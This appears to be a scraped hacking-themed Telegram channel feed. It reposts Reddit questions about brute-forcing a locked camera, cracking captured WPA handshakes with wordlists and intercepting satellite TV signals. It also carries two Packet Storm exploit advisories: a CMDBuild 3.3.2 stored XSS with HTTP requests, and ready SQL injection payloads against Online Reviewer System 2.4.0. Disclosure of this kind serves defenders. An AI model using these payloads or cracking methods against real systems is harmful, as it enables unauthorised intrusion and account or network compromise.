Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
How would you crack a 4 digit locked night vision hunting camera?

Hi. So I found a hunting camera in a storage unit but after trying to turn it on, I saw it was locked by a 4 digit code. It only has a set of four arrow keys and an ok key so no numpad. It also has a micro USB port. How would one unlock such camera?

Edit: I'm thinking like soomething that brute forces it but automatically I don't wanna manually try 10k different combinations.

submitted by /u/tryerxintensity
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Which wpa dictionaries do you use for Indian wifi networks?

I generally use rockyou, probable, other default ones from kali/parrot, all 8 digit numbers, darkc0de and small ones from wpa-sec.stanev.

Also, I upload the handshakes to wpa-sec.stanev and onlinehashcrack as they crack it for free. But what if I'm still not able to crack it? Any more wordlists suggestions please?

I have hashcat with 150 kH/s. Thanks

submitted by /u/U1karsh
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Trying to intercept the data transmitted in DTH Signals, or even send signals to the STB.

The STB operates on the Ku band(12-18 GHz) Used these to find some information: https://www.lyngsat.com/ Location of STB: India

Couldn’t find any information about the laws related to modification of DTH signals. Please inform me if it’s crime, if it’s not please tell me how i can proceed.

This is purely for educational purposes only.

submitted by /u/barathrajkb
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
File Explore WLAN

My iPhone is locked and I need to reference a file a for work. Slightly urgent but is there any way to access my iPhone via file exploring on either my pc or tablet since they're all on the same network?

submitted by /u/Silky_Johnson7
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CMDBuild 3.3.2 Cross Site Scripting

https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
CMDBuild version 3.3.2 suffers from cross site scripting vulnerabilities.

MD5 | 5c78cbeb9008e6af507f9096fd21c949

Download
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts :

Stored Xss Example:

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\">x ","Description":null,"Surname":"\">x ","Name":"\">x ","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Reviewer System 2.4.0 SQL Injection

https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
Online Reviewer System version 2.4.0 suffers from a remote SQL injection vulnerability.

MD5 | e0d67c854d6f65ba496fbc8683da167c

Download
## [Sourcecodester-Online-Reviewer-System-2.4.0 SQL - 4 types of
injection vulnerability](https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html)

## [Vendor](https://www.sourcecodester.com/users/janobe)

## Description:
The password parameter appears of the Online Reviewer System 1.0 to be
vulnerable to SQL injection attacks - 4 types of injection
vulnerability.
A single quote was submitted in the password parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message disappeared.

## Payloads:

```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=TtzgjjZP' OR NOT
2693=2693#&password=r1L!h4v!O1'&btn-login=Log In

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: username=TtzgjjZP' AND (SELECT 4139 FROM(SELECT
COUNT(*),CONCAT(0x71707a7171,(SELECT
(ELT(4139=4139,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
GJJK&password=r1L!h4v!O1'&btn-login=Log In

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: username=TtzgjjZP';SELECT
SLEEP(5)#&password=r1L!h4v!O1'&btn-login=Log In

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=TtzgjjZP' AND (SELECT 8716 FROM
(SELECT(SLEEP(5)))MJXH)-- xWIO&password=r1L!h4v!O1'&btn-login=Log In
---
```

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Navigating the Complexity of Today's Digital Supply Chain

An efficient way to monitor security is to model user behavior using time series data and watching for anomalies.
Dark Reading: Attacks/Breaches
4 Considerations for Improving Cloud Security Hygiene

Mixing cloud security and maintenance practices with legacy enterprise approaches usually ends up shortchanging cloud hygiene. Here are some ways to remedy that.